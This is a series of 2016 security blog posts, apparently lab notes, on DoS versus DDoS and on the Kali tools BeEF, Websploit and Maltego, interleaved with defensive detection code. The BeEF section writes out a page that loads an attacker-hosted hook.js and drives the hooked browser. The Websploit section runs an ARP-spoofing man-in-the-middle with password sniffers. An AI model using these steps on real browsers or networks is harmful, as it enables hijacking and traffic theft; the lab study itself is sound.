<h3 id="difference">Difference</h3>
<p>DoS is launched by <strong>one machine</strong>; in contrast, DDoS is launched by <strong>distributed machines</strong>.</p>
<p>Referring to <a href="http://www.webopedia.com/TERM/D/DDoS_attack.html">DDoS attack - Distributed Denial of Service</a>, we get: “A Denial of Service (DoS) attack is different from a DDoS attack. The DoS attack typically uses one computer and one Internet connection to flood a targeted system or resource. The DDoS attack uses multiple computers and Internet connections to flood the targeted resource. DDoS attacks are often global attacks, distributed via botnets.”</p>
<h3 id="whomixedthemup">Who Mixed Them Up?</h3>
<p>I’ve been seeing this mistake for a long time: people keep mixing up these two names. If the attack was launched from only one machine, then it’s called DoS, not DDoS. Some examples of people who got it wrong:</p>
<ul>
<li><a href="http://null-byte.wonderhowto.com/how-to/become-elite-hacker-part-3-easy-ddos-0147212/">How to Become an Elite Hacker, Part 3: Easy DDOS</a></li>
<li><a href="http://www.mightyshouts.com/ddos-attack/">How to Perform a DDOS Attack on Wireless Access Point</a></li>
<li><a href="http://blognyajohny.blogspot.tw/2014/04/ddos-attack-using-hping-command-in-kali.html">DDoS attack using hping Command in Kali Linux</a></li>
</ul>
<h3 id="whythismatters">Why This Matters?</h3>
<p>DoS is easy to launch and easy to defend against. On the other hand, DDoS is always a big threat in today’s world, since victims have a difficult time distinguishing the bad guys from the large number of legitimate users. DDoS is a serious problem that we should focus on (see <a href="http://www.digitalattackmap.com/understanding-ddos/">Digital Attack Map hosted by Google</a>); and those who claim they were launching DDoS attacks when they were actually launching DoS attacks should stop delivering wrong information to the public.</p>
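<p>The distinction in the two sections above (one source versus many, and why the distributed case is harder to filter) can be made measurable on the defender’s side. Here is an added example of my own, not from this post or any tool it links: it summarises a burst of constructed access-log lines by request count, number of distinct source addresses and the share of the busiest source, and labels the burst as single-source (DoS in the post’s sense) or distributed (DDoS). The log format, the 100-request flood threshold and the 50% dominant-source share are assumptions for the example.</p>

```javascript
'use strict';

// Constructed access-log lines (common log format: client IP first). One burst
// comes from a single address, the other from 200 different ones.
const pad2 = (n) => String(n).padStart(2, '0');
const SINGLE_SOURCE_LOG = Array.from({ length: 200 }, (_, i) =>
  `10.0.0.5 - - [06/Apr/2016:10:58:${pad2(i % 60)} +0800] "GET / HTTP/1.1" 200 612`);
const DISTRIBUTED_LOG = Array.from({ length: 200 }, (_, i) =>
  `10.${(i * 37) % 256}.${(i * 91) % 256}.${(i % 250) + 1} - - ` +
  `[06/Apr/2016:10:58:${pad2(i % 60)} +0800] "GET / HTTP/1.1" 200 612`);

function sourceIp(line) {
  const m = /^(\d{1,3}(?:\.\d{1,3}){3}) /.exec(line);
  return m ? m[1] : null;
}

// Summarise a burst: how many requests, how many distinct sources, and the
// share taken by the busiest source. "One machine" shows up as one dominant
// source; "distributed machines" as many sources with none dominant. Both
// thresholds are assumptions for this example.
function classifyFlood(lines, { floodThreshold = 100, dominantShare = 0.5 } = {}) {
  const counts = new Map();
  let total = 0;
  for (const line of lines) {
    const ip = sourceIp(line);
    if (!ip) continue;
    total++;
    counts.set(ip, (counts.get(ip) || 0) + 1);
  }
  const top = [...counts.entries()].sort((a, b) => b[1] - a[1])[0];
  const topShare = top ? top[1] / total : 0;
  let verdict = 'normal';
  if (total >= floodThreshold) {
    verdict = topShare >= dominantShare ? 'dos-single-source' : 'ddos-distributed';
  }
  return { total, distinctSources: counts.size, topSource: top ? top[0] : null, topShare, verdict };
}
```

<p>The practical difference follows directly from the summary: a single dominant source can simply be blocked, while in the distributed case the busiest source accounts for half a percent of the traffic and looks like any other user.</p>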
<h3 id="howtolaunchddosthen">How To Launch DDoS Then?</h3>
<p>Too bad, I’ve never launched a DDoS attack before, which I believe it’s illegal as well. However, followings are the information about it if you’re interested in knowing more. And, <strong>one should NOT apply them on real machines/networks unless he/she fully understand the consequences</strong>.</p>
<p>First of all, you need a botnet, that is, a set of distributed machines under your control. Bad guys buy botnets on the black market. Those machines are usually ones that have been compromised, so the attacker can control them through a backdoor left on the machine.</p>
<p>Then the attacker asks all the bot machines to send requests to the victim. The requests come at a high rate, so the victim cannot handle all of them (it runs out of memory or CPU), and eventually the service freezes. <a href="http://ufonet.03c8.net/">UFONet</a> is one tool I found online, written in Python, that is designed to test/launch DDoS attacks.</p>
Heron Yang<br />
<h2 id="keywordspottingforcontrollingwindowbackgroundcolor">Keyword Spotting for Controlling Window Background Color</h2>
Published 2016-04-04.<br />
<p>This is a small test program that uses both CMUSphinx and GTK+ to demonstrate a keyword spotting (KWS) algorithm.</p>
<p>KWS is the technique used to detect a keyword at any time in a continuous audio stream. Yes, this is the technique behind “Okay, Google” and “Hey, Siri”. Whenever the machine hears the keyword, a callback function is fired.</p>
<h3 id="history">History</h3>
<ul>
<li>Originally, Hidden Markov Model (HMM) systems</li>
<li>Google, 2014, <a href="http://www.clsp.jhu.edu/~guoguo/papers/icassp2014_dnn_hotword.pdf">Deep Neural Network (DNN)</a>, shown to outperform the HMM system</li>
<li>Google, 2015, <a href="http://www.isca-speech.org/archive/interspeech_2015/papers/i15_1478.pdf">Convolutional Neural Networks (CNNs)</a>, shown to outperform the DNN
<ul>
<li>DNNs ignore input topology, as the (fixed) input can be presented in any order without affecting the performance of the network</li>
<li>DNNs are not explicitly designed to model translational variance within speech signals, which can exist due to different speaking styles; CNNs capture translational invariance with far fewer parameters by averaging the outputs of hidden units</li>
</ul></li>
</ul>
<h3 id="tools">Tools</h3>
<p><a href="http://cmusphinx.sourceforge.net/">CMU Sphinx Project by Carnegie Mellon University</a></p>
<ul>
<li>CMU LTI, Language Technologies Institute</li>
<li>Designed to run on different platforms including iOS, Android, Raspberry Pi, etc.</li>
<li>License: BSD-style (nice!)</li>
</ul>
<p><a href="https://wolfpaulus.com/journal/embedded/raspberrypi2-sr/">Raspberry Pi 2 – Speech Recognition on device</a></p>
<ul>
<li>Upload word list to http://www.speech.cs.cmu.edu/tools/lmtool-new.html</li>
<li>Use the generated .lm and .dict files with the command: <code>pocketsphinx_continuous -inmic yes -lm 0730.lm -dict 0730.dic -samprate 16000/8000/48000</code></li>
</ul>
<h3 id="mycode">My Code</h3>
<p>Github link: <a href="https://github.com/heronyang/kws-color-demo">https://github.com/heronyang/kws-color-demo</a></p>
<h4 id="components">Components</h4>
<p>In <code>main.c</code>, the program fires up a thread for handling GUI jobs right after it starts. Then it sets up pocketsphinx and calls <code>recognize_from_microphone</code> or <code>recognize_from_file</code> for the audio input. Since argc/argv are passed into the settings, the user can specify the dictionary file or log file as written in <code>run.sh</code>.</p>
<h4 id="run">Run</h4>
<pre><code>> ./run.sh
</code></pre>
<h4 id="demo">Demo</h4><br />
<iframe width="640" height="480" src="https://www.youtube.com/embed/QKDa5MwBejE?rel=0" frameborder="0" allowfullscreen></iframe><br />
Heron Yang<br />
<h2 id="kalitoolseriesbeef">Kali Tool Series - BeEF</h2>
Published 2016-04-01.<br />
“BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.”<br />
<br />
<h3 id="howitworks">
How It Works</h3>
Basically: first start the BeEF server, then get the victim to run hook.js in his/her browser; after that we can read information about the victim’s machine or control the browser.<br />
<br />
<h4 id="startbeefserver">
Start BeEF Server</h4>
<pre><code>> beef-xss
[*] Please wait as BeEF services are started.
[*] You might need to refresh your browser once it opens.
[*] UI URL: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>
…
</code></pre>
Then, open the browser with URL <code>http://127.0.0.1:3000/ui/panel</code> on Kali, and you’ll see the BeEF Control Panel.<br />
<br />
<h4 id="letvictimrunhook.js">
Let Victim Run hook.js</h4>
I’m not covering the strategies for getting people to run hook.js in the real world, which I believe involve some social engineering. Instead, I run a simple web server on Kali on a port other than 3000 (used by the BeEF server), then let the victim open a web page that has hook.js embedded.<br />
<br />
<strong>Setup the Web Page</strong><br />
Usually some deception is involved here, but I’m skipping that for study purposes. What I built is just a blank page with the label “hello”. Save the following page as <code>index.html</code> somewhere on Kali.<br />
<pre><code><!DOCTYPE html>
<html>
<head>
</head>
<body>
<h1>hello</h1>
<script src="http://192.168.63.155:3000/hook.js"></script>
</body>
</html>
</code></pre>
<code>192.168.63.155</code> is the IP of Kali, which is a local IP, so only machines on the same local network can reach it later on.<br />
<br />
<strong>Setup the Web Server</strong><br />
I’m using Python’s SimpleHTTPServer, so:<br />
<pre><code>> python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
</code></pre>
The web server starts and listens on port 8000.<br />
<br />
<strong>Victim Visit</strong><br />
As Kali is running in a VM, I visit the site I just set up from my host machine (Mac). Simply opening <code>http://192.168.63.155:8000</code> works.<br />
<br />
<h4 id="controlthevictim">
Control the Victim</h4>
On Kali, a new item pops up in the left-hand list. You can start reading the victim’s information or controlling it.<br />
<br />
<h3 id="whatyoucando">
What You Can Do</h3>
On the Commands tab in the BeEF Control Panel, you can see a list of actions you can perform on the victim. Well, in my experiment quite a lot of them don’t work, possibly because the browsers have fixed the security flaws, or just because the BeEF code isn’t up to date.<br />
On the BeEF Control Panel, a colored circle next to each action indicates its status:<br />
<ul>
<li>green: works on the target; invisible to the user.</li>
<li>orange: works on the target; visible to the user.</li>
<li>grey: not yet verified whether it works on the target.</li>
<li>red: does not work on the target.</li>
</ul>
Here I list some actions I found to work.<br />
<br />
<h4 id="playsound">
Play Sound</h4>
This command plays a sound on the target machine given the sound’s URL. I searched randomly on <a href="http://www.findsounds.com/">www.findsounds.com</a> and got this link:<br />
<pre><code>http://princezze.free.fr/sounds/laugh.MP3
</code></pre>
Put it into the panel, and it works.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzetDX158RPu17W4Pi_4QOMHAouXqEKEb9ccXRn3jUWUdpfKGY01BHyd6NRRiDXq3nx5qNELUANPsAt0olGTRx7ncWpQiqaEkIB3FHXcM006ZmwcMpNY0_hF_RznR3Nf-9klXA7Jx1LEWR/s1600/Screen+Shot+2016-04-01+at+2.42.56+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzetDX158RPu17W4Pi_4QOMHAouXqEKEb9ccXRn3jUWUdpfKGY01BHyd6NRRiDXq3nx5qNELUANPsAt0olGTRx7ncWpQiqaEkIB3FHXcM006ZmwcMpNY0_hF_RznR3Nf-9klXA7Jx1LEWR/s640/Screen+Shot+2016-04-01+at+2.42.56+PM.png" width="640" /></a></div>
<br />
<h4 id="iframeeventlogger">
iFrame Event Logger</h4>
This one lets the attacker open a website in the victim’s browser by providing its URL. It won’t work on sites that forbid being framed by another origin. That is, if you try to open Google.com, you get the following error in the victim’s browser console.<br />
<pre><code>[Error] Refused to display 'https://www.google.com/?gws_rd=ssl' in a frame because it set 'X-Frame-Options' to 'SAMEORIGIN'.
</code></pre>
But it’s fine with other simple websites like <code>http://www.heron.me/</code>.<br />
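The console error above is the browser enforcing the site’s anti-framing policy. The following is an added example, not code from the original post or from BeEF, that reproduces that decision for a given set of response headers: it evaluates <code>X-Frame-Options</code> and the CSP <code>frame-ancestors</code> directive to say whether a page at one origin may frame a response from another. The header sets, the <code>partner.example</code>/<code>site.example</code> names and the <code>recommended_anti_framing_headers</code> helper are constructed for illustration; only the <code>192.168.63.155:8000</code> hook page comes from the post.<br />

```python
"""Added example, not part of the original post or of BeEF: decide whether a
browser would let a page at embedder_origin frame a response, from the
response's X-Frame-Options and Content-Security-Policy frame-ancestors
headers. The header sets at the bottom are constructed for illustration."""


def _split_origin(origin):
    """'https://Host:8443/path' -> ('https', 'host', 8443); port None if absent.
    Deliberately simple: no IPv6 literals, no default-port folding."""
    scheme, _, rest = origin.strip().lower().partition("://")
    hostport = rest.split("/", 1)[0]
    host, _, port = hostport.partition(":")
    return scheme, host, (int(port) if port else None)


def _source_matches(source, embedder, target):
    """Match one frame-ancestors source expression against the embedder."""
    src = source.lower()
    if src == "'none'":
        return False
    if src == "'self'":
        return _split_origin(embedder) == _split_origin(target)
    if src == "*":
        return True
    e_scheme, e_host, e_port = _split_origin(embedder)
    if "://" in src:
        s_scheme, s_host, s_port = _split_origin(src)
        if s_scheme != e_scheme or (s_port is not None and s_port != e_port):
            return False
    else:
        s_host = src                       # host-source without a scheme
    if s_host.startswith("*."):            # "*.example.com" matches subdomains
        return e_host.endswith(s_host[1:])
    return e_host == s_host


def frame_allowed(headers, embedder_origin, target_origin):
    """True if embedder_origin may frame a response carrying these headers.
    frame-ancestors takes precedence over X-Frame-Options when present; with
    neither header the browser permits framing (the "simple website" case)."""
    lowered = {k.lower(): v for k, v in headers.items()}
    for directive in lowered.get("content-security-policy", "").split(";"):
        name, _, value = directive.strip().partition(" ")
        if name.lower() == "frame-ancestors":
            # An empty source list behaves like 'none'.
            return any(_source_matches(s, embedder_origin, target_origin)
                       for s in value.split())
    xfo = lowered.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return _split_origin(embedder_origin) == _split_origin(target_origin)
    return True


def recommended_anti_framing_headers():
    """Both headers, so old browsers (XFO) and new ones (CSP) refuse framing."""
    return {"X-Frame-Options": "DENY",
            "Content-Security-Policy": "frame-ancestors 'none'"}


# Constructed header sets for three kinds of sites.
SAMEORIGIN_SITE = {"X-Frame-Options": "SAMEORIGIN"}
PARTNER_SITE = {"Content-Security-Policy":
                "default-src 'self'; frame-ancestors 'self' https://*.partner.example"}
OPEN_SITE = {"Content-Type": "text/html"}

if __name__ == "__main__":
    hook_page = "http://192.168.63.155:8000"    # the hook page from the post
    print(frame_allowed(SAMEORIGIN_SITE, hook_page, "https://www.google.com"))  # False
    print(frame_allowed(OPEN_SITE, hook_page, "http://www.heron.me"))           # True
```

A site that sends neither header is the “simple website” case: any page, including a hooked one, can load it in an iframe. Sending both headers from <code>recommended_anti_framing_headers()</code> is the usual fix, since older browsers only understand <code>X-Frame-Options</code> while current ones give <code>frame-ancestors</code> precedence.<br />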
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXNzzzyw9M6OFmrUDToi14gw6eX7LTcUkhyphenhyphennnypFqinNlZdGEUJWVAAUJ3_U4kr7lZ80vIIYemzfJPKXJZyZE-zERxhsJlG4CSdfNnckC0_LhweT5_6dZyxCdkb4NY8YZiIUektgyMbPL-/s1600/Screen+Shot+2016-04-01+at+3.15.10+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="246" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXNzzzyw9M6OFmrUDToi14gw6eX7LTcUkhyphenhyphennnypFqinNlZdGEUJWVAAUJ3_U4kr7lZ80vIIYemzfJPKXJZyZE-zERxhsJlG4CSdfNnckC0_LhweT5_6dZyxCdkb4NY8YZiIUektgyMbPL-/s640/Screen+Shot+2016-04-01+at+3.15.10+PM.png" width="640" /></a></div>
<br />
<br />
<h4 id="excutejavascriptcode">
Execute JavaScript Code</h4>
This is the key point. As the attack is triggered when the user runs hook.js, all further actions are carried out by sending JavaScript code from the attacker to the victim. So executing JavaScript code on the attacker’s demand brings maximum flexibility.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiatGnIsCSVjO6Cs4cfe-jLHERkBGn7HVuUvSj1XA9SeA_J7cR9VpwqQ5QBrxRVSJxSqOCsQJynT2BPxrtxLC-mfVxgyJcLpgV4AA5UGDxbt2uOAKysBJ5xHiyGa-1u4bdPFUxZZjoiER4w/s1600/Screen+Shot+2016-04-01+at+3.39.09+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiatGnIsCSVjO6Cs4cfe-jLHERkBGn7HVuUvSj1XA9SeA_J7cR9VpwqQ5QBrxRVSJxSqOCsQJynT2BPxrtxLC-mfVxgyJcLpgV4AA5UGDxbt2uOAKysBJ5xHiyGa-1u4bdPFUxZZjoiER4w/s640/Screen+Shot+2016-04-01+at+3.39.09+PM.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcDtnPQ67QFCT0M3TIHdyARx1A8WU9HmCOXo5X3MlXxvoqGCvOWgPnCetgIZlW5hykfsBajoTe5jCVSmfKTIJzex4pAvqSUluOYTKpnM0F8TP69qRd1xZQ-vTq_7NT_VNFcB94lmHfIvPT/s1600/Screen+Shot+2016-04-01+at+3.39.25+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcDtnPQ67QFCT0M3TIHdyARx1A8WU9HmCOXo5X3MlXxvoqGCvOWgPnCetgIZlW5hykfsBajoTe5jCVSmfKTIJzex4pAvqSUluOYTKpnM0F8TP69qRd1xZQ-vTq_7NT_VNFcB94lmHfIvPT/s640/Screen+Shot+2016-04-01+at+3.39.25+PM.png" width="640" /></a></div>
<br />
<br />
<h3 id="other">
Other</h3>
Some commands don’t show their result on the control panel, or show it somewhere I couldn’t find. So I switched to my favorite Terminal and found the results there.<br />
They are saved in an SQLite .db file; using an SQLite tool, we can access the results:<br />
<pre><code>> cd /var/lib/beef-xss
> sqlitebrowser beef.db
</code></pre>
Check the <code>core_results</code> table for the results.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQyBk7xpEha7kBsz6_0Aabb8k7LwzPSr5QzLZCwmb-_aOohioiGeAvdYQBWfZI1kWM4Eup6bmEjClLHq6KNqtC6w0_UB8OwOjNrCugxHCNsi8WKFntDxaZ-bgdI1i_8384VTxz5xxBz3DY/s1600/Screen+Shot+2016-04-01+at+3.19.42+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQyBk7xpEha7kBsz6_0Aabb8k7LwzPSr5QzLZCwmb-_aOohioiGeAvdYQBWfZI1kWM4Eup6bmEjClLHq6KNqtC6w0_UB8OwOjNrCugxHCNsi8WKFntDxaZ-bgdI1i_8384VTxz5xxBz3DY/s640/Screen+Shot+2016-04-01+at+3.19.42+PM.png" width="640" /></a></div>
<br />
<h3 id="reference">
Reference</h3>
<ul>
<li><a href="http://beefproject.com/">BeEF Project</a></li>
<li><a href="http://www.picateshackz.com/2015/09/kali-linux-tutorial-hack-web-browser-with-beff.html">Kali Linux Tutorial: Hack A Web Browser Using BeEF</a></li>
</ul>
Heron Yang<br />
<h2 id="kalitoolserieswebsploit">Kali Tool Series - Websploit</h2>
Published 2016-03-30.<br />
<p>Although there seem to be handier tools for web exploits than Websploit, it still interests me because it has an interface similar to <a href="http://note.heron.me/2016/03/kali-tool-series-metasploit.html">Metasploit</a>.</p>
<h3 id="tostart">To Start</h3>
<pre><code>> websploit
__ __ ___ ____ _____ ____ _ ___ ____ ______
| |__| | / _]| \ / ___/| \| | / \| || |
| | | | / [_ | o )( \_ | o ) | | || | | |
| | | || _]| | \__ || _/| |___ | O || | |_| |_|
| ` ' || [_ | O | / \ || | | || || | | |
\ / | || | \ || | | || || | | |
\_/\_/ |_____||_____| \___||__| |_____| \___/|____| |__|
--=[WebSploit FrameWork
+---**---==[Version :2.0.5 BETA
+---**---==[Codename :We're Not Crying Wolf
+---**---==[Available Modules : 19
--=[Update Date : [r2.0.5-000 2.3.2014]
wsf >
</code></pre>
<p>Show the available modules:</p>
<pre><code>wsf > show modules
Web Modules Description
------------------- ---------------------
web/apache_users Scan Directory Of Apache Users
web/dir_scanner Directory Scanner
web/wmap Information Gathering From Victim Web Using (Metasploit Wmap)
web/pma PHPMyAdmin Login Page Scanner
web/cloudflare_resolver CloudFlare Resolver
Network Modules Description
------------------- ---------------------
network/arp_dos ARP Cache Denial Of Service Attack
network/mfod Middle Finger Of Doom Attack
network/mitm Man In The Middle Attack
network/mlitm Man Left In The Middle Attack
network/webkiller TCP Kill Attack
network/fakeupdate Fake Update Attack Using DNS Spoof
network/arp_poisoner Arp Poisoner
Exploit Modules Description
------------------- ---------------------
exploit/autopwn Metasploit Autopwn Service
exploit/browser_autopwn Metasploit Browser Autopwn Service
exploit/java_applet Java Applet Attack (Using HTML)
Wireless / Bluetooth Modules Description
------------------- ---------------------
wifi/wifi_jammer Wifi Jammer
wifi/wifi_dos Wifi Dos Attack
wifi/wifi_honeypot Wireless Honeypot(Fake AP)
bluetooth/bluetooth_pod Bluetooth Ping Of Death Attack
</code></pre>
<h3 id="cases">Cases</h3>
<p>Here I am going to try some modules in Websploit, and the target will be my own Metasploitable2 virtual machine. Make sure you don’t try any of the actions described here on a running machine that doesn’t belong to you.</p>
<h4 id="scandirectories">Scan Directories</h4>
<p>We are scanning the directories on the target machine by brute-forcing directory names with HTTP requests. As far as I know, <a href="http://sectools.org/tool/dirbuster/">DirBuster</a> is also well known for this job. And this activity is easy for the target to notice, since lots of invalid requests are sent out in a short period.</p>
<pre><code>wsf > use web/dir_scanner
wsf:Dir_Scanner > show options
Options Value
--------- --------------
TARGET http://google.com
wsf:Dir_Scanner > set target http://192.168.63.156
TARGET => 192.168.63.156
wsf > run
…
</code></pre>
<p>However, I don’t think the program does a good job, as it doesn’t print results as it goes; the user has to wait until it completes. And it usually takes a long time.</p>
<h4 id="maninthemiddle">Man in the Middle</h4>
<p><em>Man in the Middle</em> is an interesting attack. The attacker stays silent, intercepts the victim’s network traffic, then passes it on. That is, the victim may not notice that his/her traffic is being fully monitored by the attacker.</p>
<p>Attacker side:</p>
<pre><code>wsf > use network/mitm
wsf:MITM > show options
Options Value RQ Description
--------- -------------- ---- --------------
Interface eth0 yes Network Interface Name
ROUTER 192.168.1.1 yes Router IP Address
TARGET 192.168.1.2 yes Target IP Address
SNIFFER driftnet yes Sniffer Name (Select From Sniffer List)
SSL true yes SSLStrip, For SSL Hijacking(true or false)
Sniffers Description
------------ --------------
dsniff Sniff All Passwords
msgsnarf Sniff All Text Of Victim Messengers
urlsnarf Sniff Victim Links
driftnet Sniff Victim Images
wsf:MITM > set TARGET 192.168.63.156
TARGET => 192.168.63.156
wsf:MITM > set ROUTER 192.169.63.1
ROUTER => 192.169.63.1
wsf:MITM > set SNIFFER urlsnarf
SNIFFER => urlsnarf
wsf:MITM > run
[*]IP Forwarding ...
[*]ARP Spoofing ...
[*]Sniffer Starting ...
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]
</code></pre>
<p>Then the victim starts to browse the Internet. I’m letting the victim run <code>wget google.com</code> to simulate Internet surfing.</p>
<p>Back on the attacker’s side, here is what he/she received:</p>
<pre><code>192.168.63.156 - - [30/Mar/2016:17:36:16 +0800] "GET http://google.com/ HTTP/1.0" - - "-" "Wget/1.10.2"
192.168.63.156 - - [30/Mar/2016:17:36:26 +0800] "GET http://www.google.com.tw/?gfe_rd=cr&ei=D577VtbIMZCS9QWylY-AAw HTTP/1.0" - - "-" "Wget/1.10.2"
</code></pre>
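<p>The <code>[*]ARP Spoofing ...</code> step above is what makes the redirection work: the victim’s ARP cache is taught that the router’s IP lives at the attacker’s MAC. The following is an added example, not code from the original post or from Websploit, showing the defender’s side of that step. It parses successive <code>arp -n</code>-style snapshots and flags the two classic signs of cache poisoning: an IP whose hardware address changes, and one MAC answering for several IPs. The snapshots and MAC addresses are constructed; the gateway address <code>192.168.63.1</code> is an assumption, and <code>192.168.63.155</code> is the Kali address from the BeEF post.</p>

```python
"""Added example, not part of the original post or of Websploit: a defender's
check for ARP cache poisoning. Consecutive `arp -n` snapshots (constructed
here) are compared; an IP whose MAC changes, or a MAC bound to several IPs,
is reported."""
import re

# Linux `arp -n` row: "<ip>  ether  <mac>  <flags>  <iface>"; header rows do not match.
ARP_RE = re.compile(r"^(\d+\.\d+\.\d+\.\d+)\s+ether\s+([0-9a-f:]{17})", re.I)


def parse_arp_table(text):
    """Map IP -> MAC (lower-cased) from `arp -n` output."""
    table = {}
    for line in text.splitlines():
        m = ARP_RE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table


def find_arp_anomalies(snapshots):
    """Compare consecutive snapshots and return (kind, detail) tuples:
    'mac_changed' when an IP's MAC differs from the previous snapshot,
    'mac_shared' when one MAC is bound to more than one IP in a snapshot."""
    alerts = []
    previous = {}
    for idx, snapshot in enumerate(snapshots):
        table = parse_arp_table(snapshot)
        for ip, mac in table.items():
            if ip in previous and previous[ip] != mac:
                alerts.append(("mac_changed",
                               f"snapshot {idx}: {ip} moved from {previous[ip]} to {mac}"))
        by_mac = {}
        for ip, mac in table.items():
            by_mac.setdefault(mac, []).append(ip)
        for mac, ips in by_mac.items():
            if len(ips) > 1:
                alerts.append(("mac_shared",
                               f"snapshot {idx}: {mac} answers for {', '.join(sorted(ips))}"))
        previous = table
    return alerts


# Constructed snapshots taken on the victim before and during the attack.
# 192.168.63.1 (assumed gateway) and the MAC addresses are made up for the example.
BEFORE = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.63.1             ether   00:50:56:c0:00:08   C                     eth0
192.168.63.155           ether   00:0c:29:aa:bb:cc   C                     eth0
"""
DURING = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.63.1             ether   00:0c:29:aa:bb:cc   C                     eth0
192.168.63.155           ether   00:0c:29:aa:bb:cc   C                     eth0
"""

if __name__ == "__main__":
    for kind, detail in find_arp_anomalies([BEFORE, DURING]):
        print(kind, "-", detail)
```

<p>The same two checks are what tools like arpwatch automate; a static ARP entry for the gateway on critical hosts, or dynamic ARP inspection on the switch, removes the condition entirely.</p>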
<h3 id="reference">Reference</h3>
<ul>
<li><a href="http://www.hackingtutorials.org/web-application-hacking/websploit-directory-scanner-scanning-webserver-directories/">Websploit Directory Scanner – Scanning</a></li>
<li><a href="http://tools.kali.org/web-applications/websploit">WebSploit Package Description</a></li>
<li><a href="http://cyborg.ztrela.com/websploit.php/">WebSploit Advanced MITM Framework</a></li>
</ul>
Heron Yang<br />
<h2 id="kalitoolseriesmaltego">Kali Tool Series - Maltego</h2>
Published 2016-03-29.<br />
Maltego is a reconnaissance tool built into Kali and developed by Paterva. It is a powerful information-gathering tool that covers everything from Internet infrastructure to personal information and social networks.<br />
<h3 id="palette">
Palette</h3>
Palette, here, refers to the object types supported by Maltego for drawing the network graph of the target. Each object type represents an item in the real world and carries relevant attributes. By running <em>transform</em> actions, we can expand one object into the whole network of interest.<br />
In Maltego, we have the following types in the Palette:<br />
<ul>
<li>Device</li>
<li>Infrastructure
<ul>
<li>AS</li>
<li>DNS Name</li>
<li>Domain</li>
<li>IPv4 Address</li>
<li>MX Record</li>
<li>NS Record</li>
<li>Netblock</li>
<li>URL</li>
<li>UniqueIdentifier</li>
<li>Website</li>
</ul>
</li>
<li>Locations
<ul>
<li>Circular Area</li>
<li>GPS Coordinate</li>
<li>Location</li>
</ul>
</li>
<li>Personal
<ul>
<li>Alias</li>
<li>Document</li>
<li>Email Address</li>
<li>Image</li>
<li>Person</li>
<li>Phone Number</li>
<li>Phrase</li>
</ul>
</li>
<li>Social Network
<ul>
<li>Facebook</li>
<li>Twitter</li>
</ul>
</li>
</ul>
<h3 id="steps">
Steps</h3>
<strong>Step 1 - Open Maltego</strong><br />
Open Maltego via the Application menu → Information Gathering → Maltego (or just type <code>maltego</code> in a Terminal), then register an account and select the transform seeds to install.<br />
<strong>Step 2 - Pick a Start Node</strong><br />
You can start from a website URL, a person, or anything mentioned above in the Palette.<br />
<strong>Step 3 - Expand</strong><br />
Right-click on the object, then perform a “transform” action, which expands the graph by adding connections to other objects.<br />
<br />
<h3 id="exampleoutput">
Example Output</h3>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1reFgC7pQiN6DeJleU9UX2RIYV5HKODK3EVJmYIcZwqBzQjrKYIPkoKa6aa8PbhI8tMNOpOut9h708wA7Z5bcjeLljakS72TuyXBiGcQRCjt12NKH06wVLAYCIciBZTBmdsYGHcm8igHP/s1600/Screen+Shot+2016-03-29+at+4.24.36+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1reFgC7pQiN6DeJleU9UX2RIYV5HKODK3EVJmYIcZwqBzQjrKYIPkoKa6aa8PbhI8tMNOpOut9h708wA7Z5bcjeLljakS72TuyXBiGcQRCjt12NKH06wVLAYCIciBZTBmdsYGHcm8igHP/s640/Screen+Shot+2016-03-29+at+4.24.36+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Information gathering starting from my domain, heron.me.</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
